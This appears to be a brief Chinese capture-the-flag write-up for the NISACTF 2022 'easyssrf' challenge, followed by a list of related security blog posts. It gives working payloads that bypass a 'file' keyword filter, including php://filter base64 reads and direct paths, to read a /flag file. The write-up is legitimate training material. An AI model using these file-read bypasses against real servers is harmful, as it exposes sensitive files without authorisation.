[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
亿林网络4 小时前
等保测评——云计算安全扩展(云计算关键技术)
安全·网络安全·云计算·等保测评·等级保护
BTY@BTY6 小时前
CVE-2020-26048(文件上传+SQL注入)
数据库·sql·安全·web安全·网络安全
小梁不秃捏15 小时前
计算机网络之入门
网络协议·计算机网络·网络安全
白帽子00816 小时前
网络安全学习路线图(2024版详解)
学习·安全·web安全·网络安全·网安入门
士别三日wyx16 小时前
已解决 SyntaxError: invalid syntax,Python报错原因和解决方案。
开发语言·人工智能·python·安全·web安全·网络安全
Da1NtY092620 小时前
[渗透测试] SSRF 服务端请求伪造
安全·网络安全·系统安全
玥轩_5211 天前
网络安全 DVWA通关指南 Cross Site Request Forgery (CSRF)
安全·web安全·网络安全·靶场·csrf·dvwa·dvwa通关指南
大草原的小灰灰1 天前
密码学基础之ASN.1编码
网络安全·密码学
金灰1 天前
sqlmap注入详解
安全·web安全·网络安全·系统安全·安全威胁分析
whltaoin1 天前
web渗透-反序列化漏洞
网络安全·web渗透